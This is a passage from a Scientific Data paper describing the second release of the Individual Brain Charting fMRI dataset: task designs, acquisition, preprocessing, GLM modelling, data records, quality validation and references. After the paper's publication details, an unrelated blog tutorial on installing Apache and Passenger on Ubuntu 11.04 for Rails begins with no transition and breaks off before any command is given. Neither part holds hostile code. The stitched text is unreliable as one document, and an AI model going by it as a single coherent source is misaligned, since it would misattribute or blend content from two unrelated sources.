cohort37,38. Fixation-cross periods of three and fifteen seconds were also introduced in the beginning and end of each run, respectively.
All adjectives were presented in the lexical form according to the gender of the participant. There were also two sets of adjectives. One set was presented as new adjectives during the recognition phase and the other set for all remaining conditions of both phases. To avoid cognitive bias across the cohort, sets were switched for the other half of the participants. Plus, adjectives never repeated across runs but their sequence was fixed for the same runs and across participants from the same set. Yet, pseudo-randomization of the trials for the recognition phase was pre-determined by the authors of the original study, according to their category (i.e. “self-reference recognition”, “other-reference recognition” or “new”), such that no more than three consecutive trials of the same category were presented within a block.
For sake of clarity, Online-only Table 1 contains a full description of all main conditions employed in the experimental design of this task.
The Bang task was adapted from the study33, dedicated to investigate aging effects on neural responsiveness during naturalistic viewing.
The task relies on watching –viewing and listening– of an edited version of the episode “Bang! You’re Dead” from the TV series “Alfred Hitchcock Presents”. The original black-and-white, 25-minute episode was condensed to seven minutes and fifty five seconds while preserving its narrative. The plot of the final movie includes scenes with characters talking to each other as well as scenes with no verbal communication. Conditions of this task were thus set by contiguous scenes of speech and no speech.
This task was performed during a single run in one unique session. Participants were never informed of the title of the movie before the end of the session. Ten seconds of acquisition were added at the end of the run. The total duration of the run was thus eight minutes and five seconds.
## Data Acquisition
Data across participants were acquired throughout six MRI sessions, whose structure is described in Table 2. Deviations from this structure were registered for two MRI sessions. Besides and as referred in Section “Data quality” as well as Fig. 1, a drop of the tSNR was identified for some MRI sessions. Additionally, data of the tasks featuring this release were not yet collected for subject 8 (consult Section “Participants” for further details). These anomalies in the data are summarized on Online-only Table 2.
### Behavioral Data
Active responses were required from the participants in all tasks. The registry of all behavioral data, such as the qualitative responses to different conditions and corresponding response times, was held in log files generated by the stimulus-delivery software.
### Imaging Data
FMRI data were collected using a Gradient-Echo (GE) pulse, whole-brain Multi-Band (MB) accelerated39,40 Echo-Planar Imaging (EPI) T2*-weighted sequence with Blood-Oxygenation-Level-Dependent (BOLD) contrasts. Two different acquisitions for the same run were always performed using two opposite phase-encoding directions: one from Posterior to Anterior (PA) and the other from Anterior to Posterior (AP). The main purpose was to ensure within-subject replication of the same tasks, while mitigating potential limitations concerning the distortion-correction procedure.
Spin-Echo (SE) EPI-2D image volumes were acquired in order to compensate for spatial distortions. Similarly to the GE-EPI sequences, two different phase-encoding directions, i.e. PA and AP, were employed in different runs pertaining to this sequence. There were four runs per session: one pair of PA and AP SE EPI-2D before the start of the GE-EPI sequences and another pair at the end.
The parameters for all types of sequences employed are provided in19 as well as in the documentation available on the IBC website: https://project.inria.fr/IBC/data/
## Data Analysis
### Image conversion
The acquired DICOM images were converted to NIfTI format using the dcm2nii tool, which can be found at https://www.nitrc.org/projects/dcm2nii. During conversion to NIfTI, all images were fully anonymized, i.e. pseudonyms were removed and images were defaced using the mri_deface command line from the Freesurfer-6.0.0 library.
### Preprocessing
Source data were preprocessed using the same pipeline employed for the first release of the IBC dataset. Thus, refer to19 for more complete information about procedures undertaken during this stage.
In summary, raw data were preprocessed using PyPreprocess
(https://github.com/neurospin/pypreprocess), dedicated to launch in the python ecosystem pre-compiled functions of SPM12 software package v6685 and FSL library v5.0.
Firstly, susceptibility-induced off-resonance field was estimated from four SE EPI-2D volumes, each half acquired in opposite phase-encoding directions (see Section “Imaging Data” for details). The images were corrected based on the estimated deformation model, using the topup tool41 implemented in FSL42.
GE-EPI volumes of each participant were then aligned to each other, using a rigid body transformation, in which the average volume of all images across runs (per session) was used as reference43.
The mean EPI volume was also co-registered onto the T1-weighted MPRAGE (anatomical) volume of the corresponding participant44, acquired during the Screening session (consult19 for details).
The individual anatomical volumes were then segmented into tissue types in order to allow for the normalization of both anatomical and functional data into the standard MNI152 space, which was performed using the Unified Segmentation probabilistic framework45. Concretely, the segmented volumes were used to compute the deformation field for normalization to the standard MNI152 space.
### FMRI model specification
FMRI data were analyzed using the General Linear Model (GLM). Regressors-of-interest in the model were designed to capture variations in BOLD signal, which are in turn coupled to neuronal activity pertaining to task performance. To this end, the temporal profile of task stimuli is convolved with the Hemodynamic Response Function (HRF) –defined according to46,47– in order to obtain the theoretical neurophysiological profile of brain activity in response to behavior. The temporal profiles of stimuli, for block-design experiments, are typically characterized by boxcar functions defined by triplets –onset time, duration and trial type– that can be extracted from log files’ registries generated by the stimulus-delivery software.
Because the present release encompasses tasks with different types of experimental designs, regressors-of-interest can refer to either conditions, wherein main effects of stimuli span a relatively long period, or parametric effects of those stimuli. Online-only Table 1 contains a complete description of all regressors-of-interest implemented in the models of every task.
Nuisance regressors were also modeled in order to account for different types of spurious effects arising during acquisition time, such as fluctuations due to latency in the HRF peak response, movements, physiological noise and slow drifts within run. We also account for another type of regressors-of-no-interest, referring to either no responses or non-correct behavioral responses, implemented in the model of the Self task. Concretely, the regressors “encode_self_no_response”, “encode_other_no_response”,
“recognition_self_no_response” and “recognition_other_no_response” –related to absence of responses in each condition– plus “recognition_self_miss” and “recognition_other_miss” –related to the unsuccessful recognition of an adjective previously presented– as well as “false_alarm” –related to the misrecognition of a new adjective as one already presented– were modeled separately as means to grant an accurate isolation of the effects pertaining to “recognition” and “self reference” in the regressors-of-interest (see Section “Self task” for further details about the design of this task).
A complete description of the general procedures concerned with the GLM implementation of the IBC data can be found in the first data-descriptor article19. Such implementation was performed using Nistats python module v0.0.1b (https://nistats.github.io), leveraging Nilearn python module v0.6.048 (https://nilearn.github.io/).
### Model estimation
In order to restrict GLM parameters estimation to voxels inside functional brain regions, a brain mask was extracted from the normalized mean GE-EPI volume thresholded at a liberal level of 0.25, using Nilearn. This corresponds to a 25% average probability of finding gray matter in a particular voxel across subjects. A mass-univariate GLM fit was then applied to the preprocessed EPI data, for every run in every task, using Nistats. For this fit, we set a spatial smoothing of 5 mm full-width-at-half-maximum as a regularization term of the model; spatial smoothing is a standard procedure that ensures an increase of the Signal-to-Noise Ratio (SNR) at the same time that facilitates between-subject comparison. Parameter estimates for all regressors implemented in the model were computed, along with the respective covariance, at every voxel. Linear combinations between parameter estimates computed for the regressors-of-interest (listed on Online-only Table 1) as well as for the baseline were performed in order to obtain contrast maps with the relevant evoked responses.
More details about model estimation can be found in the first data-descriptor article19. Its implementation and the ensuing statistical analyses were performed using Nistats (about Nistats, see Section “FMRI Model Specification”).
### Summary statistics
Because data were collected per task and subject in –at least– two acquisitions with opposite phase-encoding directions (see Section “Imaging Data” for details), statistics of their joint effects were calculated under a Fixed-Effects (FFX) model.
t-tests were then computed at every voxel for each individual contrast, in order to assess for statistical significance in differences among evoked responses. To assure standardized results that are independent from the number of observations, t-values were directly converted into z-values.
Data derivatives are thus delivered as individual contrast maps containing standard scores in all voxels that are confined to a grey-matter-mask with an average threshold >25% across subjects. We note that these postprocessed individual maps were obtained from the GLM fit of preprocessed EPI maps and, thus, they are represented in the standard MNI152 space. For more information about the access to the data derivatives, refer to Section “Derived statistical maps”.
## Data Records
Both raw fMRI data (aka “source data”) as well as derived statistical maps of the IBC dataset are publicly available.
### Source data
Source data of the present release (plus first and third releases) can be accessed via the public repository OpenNeuro49 under the data accession number ds00268550. This collection comprises 1.1 TB of MRI data. A former collection only referring to source data from the first release is still available in the same repository51.
The NIfTI files as well as paradigm descriptors and imaging parameters are organized per run for each session according to BIDS Specification:
• the data repository is organized in twelve main directories sub-01 to sub-15; we underline that sub-02, sub-03 and sub-10 are not part of the dataset and corresponding data from sub-08 will be made available in further releases (see Table 1);
• data from each subject are numbered on a per-session basis, following the chronological order of the acquisitions; we also note that this order is not the same for all subjects; the IBC documentation can be consulted for the exact correspondence between session number and session id for every subject on https://project.inria.fr/IBC/data/ (session id’s of the first and second releases are respectively provided on Table 2 of 19 and Table 2 of the present article);
• acquisitions are organized within session by modality;
• different identifiers are assigned to different types of data as follows:
• gzipped NIfTI 4D image volumes of BOLD fMRI data are named as sub-XX_ses-YY_task-ZZZ_dir-AA_bold.nii.gz, in which XX and YY refer respectively to the subject and session id, ZZZ refers to the name of the task, and AA can be either ‘PA’ or ‘AP’ depending on the phase-encoding direction;
• event files are named as sub-XX_ses-YY_task-ZZZ_dir-AA_event.tsv;
• single-band, reference images are named as sub-XX_ses-YY_task-ZZZ_dir-AA_sbref.nii.gz.
Although BIDS v1.2.1 does not provide support for data derivatives, a similar directory tree structure was still preserved for this content.
### Derived statistical maps
The unthresholded-statistic, contrast maps have been released in the public repository NeuroVault52 with the id = 661853. This collection comprises data from both releases. A former collection only referring to data derivatives from the first release is still available in the same repository (id = 443854).
## Technical Validation
### Behavioral data
Response accuracy of behavioral performance was calculated for those tasks requiring overt responses. It aims at providing a quantitative assessment of the quality of the imaging data in terms of subjects’ compliance. Because imaging data reflect herein brain activity related to behavior, scores of response accuracy across trials are good indicators of faithful functional representations regarding the cognitive mechanisms involved in the correct performance of the task. Individual scores are provided as percentages of correct responses with respect to the total number of responses in every run of a given task. The average of these scores is also provided as an indicator of the overall performance of the participant for that specific task.
### Mental time travel task battery
#### Theory-of-mind
In the Theory-of-Mind task, participants were to read stories involving either false-beliefs about the state of the world or scenery representations that were misleading or outdated. Afterwards they were to answer a question pertaining to the plot, in which one out of two possible answers was correct (see Section “Theory-of-Mind Localizer (TOM localizer)” for details). Online-only Table 4 provides the individual scores achieved for this task. The average ± SD across participants are 74 ± 16%, i.e. higher than chance level (50%). These results show that overall the participants understood the storylines and thus they were able to successfully judge the facts pointed out in the questions.
In the VSTM task, participants were asked to identify, for every trial, whether there had been a change in the orientation of one of the bars during two consecutive displays of the same number of bars (see Section “Visual Short-Term Memory task (VSTM)” for details). There were thus two possible answers. Online-only Table 5 provides the individual scores for every run and the average across runs, grouped by numerosity of the visual stimuli (measured by the number of bars); numerosity ranged from one to six. In line with the behavioral results reported in the original study (Fig. 2 - plot E of 31), the scores start decreasing more prominently for numerosity >3 (see Online-only Table 6).
In the Enumeration task, participants were asked to identify, for every trial, the exact number of bars displayed on the screen (see Section “Enumeration task” for details). The number of bars ranged from one to eight; there were thus eight possible answers. Online-only Table 7 provides the individual scores for every run and the average across runs, grouped by numerosity of the visual stimuli (measured by the number of bars). Following the overall trend of the behavioral results reported in the original study (Fig. 2 - plot D of31), the scores decrease substantially for numerosity >4 (see Online-only Table 8).
### Self task – recognition phase
The Self-task paradigm comprised two different phases: the encoding and recognition phases (see Section “Self task” for details). Both of them pertained to overt responses, although only the recognition phase required correct answers. In this particular phase, participants were to judge whether the adjective under display had already been presented in the previous encoding phase. Online-only Table 9 provides the individual scores for every run and the average across runs. The average ± SD across participants are 83 ± 8%, i.e. higher than chance level (50%), showing that participants successfully recognized either familiar or new adjectives in the majority of the “recognition” trials. Despite some low behavioral scores registered (particularly in run 3 for participant 1 and runs 0 and 1 for participant 5), we have only included trials with active and correct responses in the regressors-of-interest and, thus, neuroimaging results are not impacted by spurious effects potentially derived from occasional poor performances.
## Imaging Data
### Data quality
In order to provide an approximate estimate of data quality, measurements of the preprocessed data are presented in Fig. 1 and described as follows:
• The temporal SNR (tSNR), defined as the mean of each voxels’ time course divided by their standard deviation, on normalized and unsmoothed data averaged across all acquisitions. Its values go up to 70 in the cortex. Given the high resolution of the data (1.5 mm isotropic), such values are indicative of a good image quality55;
• The histogram of the six rigid body motion estimates of the brain per scan, in mm and degrees (for translational and rotational motion, respectively), together with their 99% coverage interval. One can notice that this interval ranges approximately within [−1.1, 1.5] mm as well as degrees, showing that motion excursions beyond 1.5 mm or degrees are rare. No acquisition was discarded due to excessive motion (>2 mm or degrees).
We observe an overall improvement of the tSNR with respect to the first release (see Section “Data quality” and Fig. 1 in19) in cortical regions, wherein functional activity in response to behavior is greatly covered (see Fig. 3). However, a poor coverage was attained for the bottom of the cerebellum (for more details about what sessions contributed specifically for this tSNR deviation, consult Online-only Table 2). Yet, as shown by Fig. 2, this issue is not driven by subject, condition or phase-encoding direction effects. It refers instead to a transient irregularity that affected the field-of-view during the acquisition period.
### Relevance of the IBC dataset for brain mapping
#### Effect of subject identity and task stimuli on activation
Taking into account the output of the GLM analysis for each acquisition, an assessment was performed at every voxel concerning how much variability of the signal could be explained by the effect of: (1) subject identity, (2) condition, and (3) phase-encoding direction. To assess the impact of these three factors, a one-way Analysis-of-Variance (ANOVA) of all contrast maps –1782 maps from the 11 subjects– was computed and results from the first-level analysis of the data were obtained for the aforementioned factors. The resulting statistical maps are displayed on the top of the Fig. 2. They show that both subject and condition effects are uniformly significant at p < 0.05, corrected for multiple comparisons using False Discovery Rate (FDR). Condition effects are overall higher than subject effects, particularly in sensory cortices like visual, auditory and somato-sensory regions. Effects pertaining to the phase-encoding direction are only significant in smaller areas comprising superior cortical regions, with special emphasis in the occipital lobe. We hypothesize that such results derive from the fact that PA data accounts for a larger amount than AP data in this dataset (see Table 2).
#### Similarity of brain activation patterns fits between-task similarity
Within-subject correlation matrices of all FFX contrast-maps pertaining to experimental conditions vs. baseline were computed as means to summarize the similarity between the functional responses to these conditions. The average of the correlation matrices across subjects was then estimated in order to assess the pattern of similarity between tasks. Because this second release accounts for a total of 49 conditions (and, consequently, 49 elementary contrasts) among all tasks, the average of correlation matrices from all participants is represented as a 49 × 49 correlation matrix (see Fig. 2, bottom-left). Note that this approach is different from performing a second-level analysis across subjects per task and compute the corresponding correlation matrix between tasks. Besides, experimental conditions were also encoded according to the Cognitive Atlas’ ontology (https://www.cognitiveatlas.org, see also21 for the link between each condition and cognitive labels). This labeling is listed in detail on Online-only Table 10, accounting for a total of 59 different cognitive components shared by the elementary contrasts. (Note that the number of cognitive components for the total amount of contrasts is 63 and, thus, slightly higher than the amount reported for the elementary contrasts only.) The 49 × 49 correlation matrix of the conditions defined in terms of occurrences of these cognitive descriptions was computed, since such labeling offers an approximate characterization of the tasks (see Fig. 2, bottom-right). They show clear similarities, together with discrepancies that are worthy of further investigation.
In order to assess the feasibility of our cognitive descriptions, we then tested how similar the cross-condition characterizations using the cognitive labels and the activation maps are from each other. A Representational Similarity Analysis56 was performed between the activation-map and the cognitive-occurrence correlation matrices by means of the Spearman correlation between their upper-triangular coefficients, which amounted to 0.21 with $$p\le 1{0}^{-13}$$. We then repeated this analysis for tasks of the first and second releases all together. They both combine 109 elementary conditions with 106 cognitive components. The Spearman correlation between the two different matrices is, in this case, 0.23 with $$p\le 1{0}^{-72}$$, which is not only higher than the correlation obtained from the tasks of the second release but also from those of the first release (Spearman correlation: 0.21, with $$p\le 1{0}^{-17}$$)19. We conclude that similarity tends to increase as more data is included in the dataset because new cognitive elements are added to the description of all tasks.
### Brain coverage
Figure 3 displays all brain areas significantly covered by the tasks of this dataset extension. Most cortical and sub-cortical regions are altogether represented by this group of tasks. By comparison with the first release, the present one shows a prominent improvement of significant coverage in the cingulate cortex, namely its posterior section in the parietal lobe and its anterior section in the prefrontal lobe. Similarly, a better coverage of the right anterior temporal lobe can also be observed in this release.
On the other hand, a prominent deviation of the results at the bottom of the cerebellum in comparison with its neighboring regions is present due to a lesser coverage of this area, as reported in Section “Data quality” and Fig. 1.
As the dataset becomes larger, one may expect a progressively improvement of brain coverage. However, as referred already in19, this coverage may not be fully attained due to MR-related technical restrictions. Some locations are particularly sensitive to e.g. coil sensitivity or intra-voxel dephasing, which can result in a reduced tSNR in certain functional brain regions.
## Usage Notes
The IBC project keeps promoting the open access and encouraging the community in adhering to practices concerned with data sharing and reproducibility in neuroimaging. Thus, free online access of raw data and derivatives is respectively assured by OpenNeuro50 and NeuroVault53.
This second release, along with the first one, brings together a variety of tasks –featuring in total 221 independent contrasts– allowing at the same time for an increase of the brain area significantly covered by these tasks (see Section “Brain Coverage” for more details).
The collection of new data continues till year 2022 and more releases are expected in the next years. The third release is already planned for the present year and it will be fully dedicated to the visual system; it will contain tasks pertaining to retinotopy, movie watching and viewing of naturalistic scenes. Future releases will also address in greater depth the auditory system through tonotopy as well as tasks on auditory language comprehension, listening of naturalistic sounds and music perception. Other tasks on biological motion, stimulus salience, working memory, motor inhibition, risk-based decision making and spatial navigation will also integrate these future releases. Finally, although IBC stands foremost as a task-fMRI dataset with a strong emphasis in the task dimension, future releases will be also dedicated to resting-state fMRI data as well as to other MRI modalities, concretely high-resolution T1- and T2- weighted, diffusion-weighted, T1- and T2- relaxometry and myelin water fraction.
The official website of the IBC project (https://project.inria.fr/IBC/) can be consulted anytime for a continuous update about the latest and forthcoming releases.
## Code availability
Metadata concerning the stimuli presented during the BOLD fMRI runs are publicly available at https://github.com/hbp-brain-charting/public_protocols. They include: (1) the task-stimuli protocols; (2) demo presentations of the tasks as video annotations; (3) instructions to the participants; and (4) scripts to extract paradigm descriptors from log files for the GLM estimation.
Task-stimuli protocols from Preference, TOM and VSTM + Enumeration batteries were adapted from the original studies in order to comply with the IBC experimental settings, without affecting the design of the original paradigms. MTT battery pertains to an original protocol developed in Python under the context of the IBC project. Protocols of Self and Bang tasks were re-written from scratch in Python with no change of the design referring to the original paradigms.
The scripts used for data analysis are available on GitHub under the Simplified BSD license:
https://github.com/hbp-brain-charting/public_analysis_code. Additionally, a full description of all contrasts featuring data derivatives (see Section “Derived statistical maps” for details) as well as a list of the main contrasts are also provided under the folder hbp-brain-charting/public_analysis_code/ibc_data.
## References
1. Wager, T. D., Lindquist, M. & Kaplan, L. Meta-analysis of functional neuroimaging data: current and future directions. Soc Cogn Affect Neurosci 2, 150–158, https://doi.org/10.1093/scan/nsm015 (2007).
2. Costafreda, S. Meta-Analysis, Mega-Analysis, and Task Analysis in fMRI Research. Philosophy, Psychiatry, & Psychology 18, 275–277, https://doi.org/10.1353/ppp.2011.0049 (2011).
3. Schwartz, Y. et al. Improving Accuracy and Power with Transfer Learning Using a Meta-analytic Database. In Ayache, N., Delingette, H., Golland, P. & Mori, K. (eds.) Med Image Comput Comput Assist Interv. 2012 (Springer, Berlin, Heidelberg), 15, 248–255. https://doi.org/10.1007/978-3-642-33454-2_31 (2012).
4. Schwartz, Y., Thirion, B. & Varoquaux, G. Mapping cognitive ontologies to and from the brain. In NIPS’13: Proceedings of the 26th International Conference on Neural Information Processing Systems (Curran Associates Inc., Red Hook, NY, USA), 2, 1673–1681. https://arxiv.org/abs/1311.3859 (2013).
5. Varoquaux, G., Schwartz, Y., Pinel, P. & Thirion, B. Cohort-Level Brain Mapping: Learning Cognitive Atoms to Single Out Specialized Regions. In Gee, J. C., Joshi, S., Pohl, K. M., Wells, W. M. & Zöllei, L. (eds.) Inf Process Med Imaging (Springer, Berlin, Heidelberg), 23, 438–449. https://doi.org/10.1007/978-3-642-38868-2_37 (2013).
6. Wager, T. D. et al. An fMRI-Based Neurologic Signature of Physical Pain. N Engl J Med 368, 1388–1397, https://doi.org/10.1056/NEJMoa1204471 (2013).
7. Gurevitch, J., Koricheva, J., Nakagawa, S. & Stewart, G. Meta-analysis and the science of research synthesis. Nature 555, 175–182, https://doi.org/10.1038/nature25753 (2018).
8. Müller, V. I. et al. Ten simple rules for neuroimaging meta-analysis. Neurosci Biobehav Rev 84, 151–161, https://doi.org/10.1016/j.neubiorev.2017.11.012 (2018).
9. Varoquaux, G. et al. Atlases of cognition with large-scale brain mapping. PLoS Comput Biol 14. https://doi.org/10.1371/journal.pcbi.1006565 (2018).
10. Barch, D. M. et al. Function in the human connectome: Task-fMRI and individual differences in behavior. Neuroimage 80, 169–89, https://doi.org/10.1016/j.neuroimage.2013.05.033 (2013).
11. Glasser, M. F. et al. A multi-modal parcellation of human cerebral cortex. Nature 536, 171–178, https://doi.org/10.1038/nature18933 (2016).
12. Pinel, P. et al. Fast reproducible identification and large-scale databasing of individual functional cognitive networks. BMC Neurosci 8, 91, https://doi.org/10.1186/1471-2202-8-91 (2007).
13. Pinel, P. et al. The functional database of the ARCHI project: Potential and perspectives. Neuroimage 197, 527–543, https://doi.org/10.1016/j.neuroimage.2019.04.056 (2019).
14. Hanke, M. et al. A high-resolution 7-Tesla fMRI dataset from complex natural stimulation with an audio movie. Sci Data 1. https://doi.org/10.1038/sdata.2014.3 (2014).
15. Hanke, M. et al. High-resolution 7-tesla fmri data on the perception of musical genres–an extension to the studyforrest dataset. F1000Res 4, 174, https://doi.org/10.12688/f1000research.6679.1 (2015).
16. Hanke, M. et al. A studyforrest extension, simultaneous fMRI and eye gaze recordings during prolonged natural stimulation. Sci Data 3. https://doi.org/10.1038/sdata.2016.92 (2016).
17. Sengupta, A. et al. A studyforrest extension, retinotopic mapping and localization of higher visual areas. Sci Data 3. https://doi.org/10.1038/sdata.2016.93 (2016).
18. Nee, D. E. fMRI replicability depends upon sufficient individual-level data. Commun Biol 2, 1–4, https://doi.org/10.1038/s42003-018-0073-z (2019).
19. Pinho, A. L. et al. Individual Brain Charting, a high-resolution fMRI dataset for cognitive mapping. Sci Data 5, 180105, https://doi.org/10.1038/sdata.2018.105 (2018).
20. Humphries, C., Binder, J. R., Medler, D. A. & Liebenthal, E. Syntactic and Semantic Modulation of Neural Activity During Auditory Sentence Comprehension. J Cogn Neurosci 18, 665–679, https://doi.org/10.1162/jocn.2006.18.4.665 (2006).
21. Poldrack, R. et al. The Cognitive Atlas: Toward a Knowledge Foundation for Cognitive Neuroscience. Front Neuroinform 5, 17, https://doi.org/10.3389/fninf.2011.00017 (2011).
22. Gorgolewski, K. et al. The brain imaging data structure: a standard for organizing and describing outputs of neuroimaging experiments. Sci Data 3, 160044, https://doi.org/10.1038/sdata.2016.44 (2016).
23. Oldfield, R. C. The assessment and analysis of handedness: the Edinburgh inventory. Neuropsychologia 9, 97–113, https://doi.org/10.1016/0028-3932(71)90067-4 (1971).
24. Gauthier, B. & van Wassenhove, V. Cognitive mapping in mental time travel and mental space navigation. Cognition 154, 55–68, https://doi.org/10.1016/j.cognition.2016.05.015 (2016).
25. Gauthier, B. & van Wassenhove, V. Time Is Not Space: Core Computations and Domain-Specific Networks for Mental Travels. J Neurosci 36, 11891–11903, https://doi.org/10.1523/JNEUROSCI.1400-16.2016 (2016).
26. Gauthier, B., Pestke, K. & van Wassenhove, V. Building the Arrow of Time. Over Time: A Sequence of Brain Activity Mapping Imagined Events in Time and Space. Cereb Cortex 29, 4398–4414, https://doi.org/10.1093/cercor/bhy320 (2018).
27. Lebreton, M., Abitbol, R., Daunizeau, J. & Pessiglione, M. Automatic integration of confidence in the brain valuation signal. Nat Neurosci 18, 1159–67, https://doi.org/10.1038/nn.4064 (2015).
28. Dodell-Feder, D., Koster-Hale, J., Bedny, M. & Saxe, R. fMRI item analysis in a theory of mind task. Neuroimage 55, 705–712, https://doi.org/10.1016/j.neuroimage.2010.12.040 (2011).
29. Jacoby, N., Bruneau, E., Koster-Hale, J. & Saxe, R. Localizing Pain Matrix and Theory of Mind networks with both verbal and non-verbal stimuli. Neuroimage 126, 39–48, https://doi.org/10.1016/j.neuroimage.2015.11.025 (2016).
30. Richardson, H., Lisandrelli, G., Riobueno-Naylor, A. & Saxe, R. Development of the social brain from age three to twelve years. Nat Commun 9. https://doi.org/10.1038/s41467-018-03399-2 (2018).
31. Knops, A., Piazza, M., Sengupta, R., Eger, E. & Melcher, D. A Shared, Flexible Neural Map Architecture Reflects Capacity Limits in Both Visual Short-Term Memory and Enumeration. J Neurosci 34, 9857–9866, https://doi.org/10.1523/JNEUROSCI.2758-13.2014 (2014).
32. Genon, S. et al. Cognitive and neuroimaging evidence of impaired interaction between self and memory in Alzheimer’s disease. Cortex 51, 11–24, https://doi.org/10.1016/j.cortex.2013.06.009 (2014).
33. Campbell, K. L. et al. Idiosyncratic responding during movie-watching predicted by age differences in attentional control. Neurobiol Aging 36, 3045–3055, https://doi.org/10.1016/j.neurobiolaging.2015.07.028 (2015).
34. Luck, S. & Vogel, E. The capacity of visual working memory for features and conjunctions. Nature 390, 279–281, https://doi.org/10.1038/36846 (1997).
35. Piazza, M., Mechelli, A., Butterworth, B. & Price, C. J. Are Subitizing and Counting Implemented as Separate or Functionally Overlapping Processes? Neuroimage 15, 435–446, https://doi.org/10.1006/nimg.2001.0980 (2002).
36. Todd, J. J. & Marois, R. Capacity limit of visual short-term memory in human posterior parietal cortex. Nature 428, 751, https://doi.org/10.1038/nature02466 (2004).
37. Newell, A. & Simon, H. A. Human problem solving. 1st edn. (Prentice-Hall, NJ, 1972).
38. Ericsson, K. A. & Kintsch, W. Long-term working memory. Psychol Rev 102, 211–245, https://doi.org/10.1037/0033-295x.102.2.211 (1995).
39. Moeller, S. et al. Multiband multislice GE-EPI at 7 Tesla, with 16-fold acceleration using partial parallel imaging with application to high spatial and temporal whole-brain fMRI. Magn Reson Med 63, 1144–53, https://doi.org/10.1002/mrm.22361 (2010).
40. Feinberg, D. A. et al. Multiplexed Echo Planar Imaging for Sub-Second Whole Brain fMRI and Fast Diffusion Imaging. PLoS One 5, 1–11, https://doi.org/10.1371/journal.pone.0015710 (2010).
41. Andersson, J. L., Skare, S. & Ashburner, J. How to correct susceptibility distortions in spin-echo echo-planar images: application to diffusion tensor imaging. Neuroimage 20, 870–888, https://doi.org/10.1016/S1053-8119(03)00336-7 (2003).
42. Smith, S. et al. Advances in functional and structural {MR} image analysis and implementation as {FSL}. Neuroimage 23(Supplement 1), S208–S219, https://doi.org/10.1016/j.neuroimage.2004.07.051 (2004).
43. Friston, K., Frith, C., Frackowiak, R. & Turner, R. Characterizing Dynamic Brain Responses with fMRI: a Multivariate Approach. Neuroimage 2, 166–172, https://doi.org/10.1006/nimg.1995.1019 (1995).
44. Ashburner, J. & Friston, K. Multimodal Image Coregistration and Partitioning - A Unified Framework. Neuroimage 6, 209–217, https://doi.org/10.1006/nimg.1997.0290 (1997).
45. Ashburner, J. & Friston, K. J. Unified segmentation. Neuroimage 26, 839–851, https://doi.org/10.1016/j.neuroimage.2005.02.018 (2005).
46. Friston, K. et al. Event-related fMRI: Characterizing differential responses. Neuroimage 7, 30–40, https://doi.org/10.1006/nimg.1997.0306 (1998).
47. Friston, K., Josephs, O., Rees, G. & Turner, R. Nonlinear event-related responses in fMRI. Magn Reson Med 39, 41–52, https://doi.org/10.1002/mrm.1910390109 (1998).
48. Abraham, A. et al. Machine learning for neuroimaging with scikit-learn. Front Neuroinform 8, 14, https://doi.org/10.3389/fninf.2014.00014 (2014).
49. Poldrack, R. et al. Toward open sharing of task-based fMRI data: the openfMRI project. Front Neuroinform 7, 12. https://doi.org/10.3389/fninf.2013.00012(2013).
50. Pinho, A. L. et al. IBC. OpenNeuro https://openneuro.org/datasets/ds002685/versions/1.0.0 (2020).
51. Pinho, A. L. et al. Individual Brain Charting. OpenNeuro. https://doi.org/10.18112/openneuro.ds000244.v1.0.0 (2017).
52. Gorgolewski, K. et al. NeuroVault.org: a web-based repository for collecting and sharing unthresholded statistical maps of the human brain. Front Neuroinform 9, 8, https://doi.org/10.3389/fninf.2015.00008 (2015).
53. Pinho, A. L. et al. IBC release 2. NeuroVault. https://identifiers.org/neurovault.collection:6618 (2020).
54. Pinho, A. L. et al. Individual Brain Charting (IBC): Activation maps per contrast, session and individual. NeuroVault. https://identifiers.org/neurovault.collection:4438 (2018).
55. Murphy, K., Bodurka, J. & Bandettini, P. A. How long to scan? the relationship between fMRI temporal signal to noise ratio and necessary scan duration. Neuroimage 34, 565–574, https://doi.org/10.1016/j.neuroimage.2006.09.032 (2007).
56. Kriegeskorte, N., Mur, M. & Bandettini, P. Representational similarity analysis–connecting the branches of systems neuroscience. Front Syst Neurosci 2. https://doi.org/10.3389/neuro.06.004.2008 (2008).
## Acknowledgements
We thank Rebecca Saxe and colleagues for making publicly available the TOM and Pain Matrices task battery and for the availability to further clarify their implementation, designs and analyses. In particular, we would like to thank Hilary Richardson for the assistance regarding the implementation of the Pain Movie localizer and extraction of its paradigm descriptors for data analysis. We also thank Karen L. Campbell and Lorraine K. Tyler for having kindly provided the video and descriptors of the “Bang” task, which were respectively necessary for a successful re-implementation of the protocol and analysis of data. We thank the Center for Magnetic Resonance Research, University of Minnesota for having kindly provided the Multi-Band Accelerated EPI Pulse Sequence and Reconstruction Algorithms. We are grateful to Kamalaker Dadi, Loubna El Gueddari and Darya Chyzhyk for their assistance in some MRI acquisitions as well as Isabelle Denghien for the advisory and technical support in setting the task protocols. At last, we are especially thankful to all volunteers who have accepted to be part of this challenging study, with many repeated MRI scans over a long period of time. This project has received funding from the European Union’s Horizon 2020 Framework Program for Research and Innovation under Grant Agreement No 720270 (Human Brain Project SGA1) and 785907 (Human Brain Project SGA2).
## Author information
Authors
### Corresponding author
Correspondence to Ana Luísa Pinho.
## Ethics declarations
### Competing interests
The authors declare no competing interests.
Publisher’s note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
## Rights and permissions
The Creative Commons Public Domain Dedication waiver http://creativecommons.org/publicdomain/zero/1.0/ applies to the metadata files associated with this article.
Reprints and Permissions
Pinho, A.L., Amadon, A., Gauthier, B. et al. Individual Brain Charting dataset extension, second release of high-resolution fMRI data for cognitive mapping. Sci Data 7, 353 (2020). https://doi.org/10.1038/s41597-020-00670-4
• Accepted:
• Published:
• DOI: https://doi.org/10.1038/s41597-020-00670-4
|
|
# Install apache web server and passenger on Ubuntu 11.04(Natty)
I just Installed apache and passenger on Ubuntu 11.04 to run and deploy my ruby on rails applications Passenger is a gem and can work with apache as well as nginx…
The reason for choosing apache is that its an industry standard.
Also one thing I did with apache was created virtual hosts and ran my apps on local machine with domains like http://www.application1.com
In this post I will list the steps I followed in order to setup apache web server and passenger.
Here is my stack:
• Ubuntu 11.04
• ruby 1.9.2 via rvm
• rubygems 1.8.10
I will be using rails 3.1.10(lastest this morning).!!
So lets start !!
• Install rvm
To install rvm just type the following in the terminal(ctrl+alt+t)
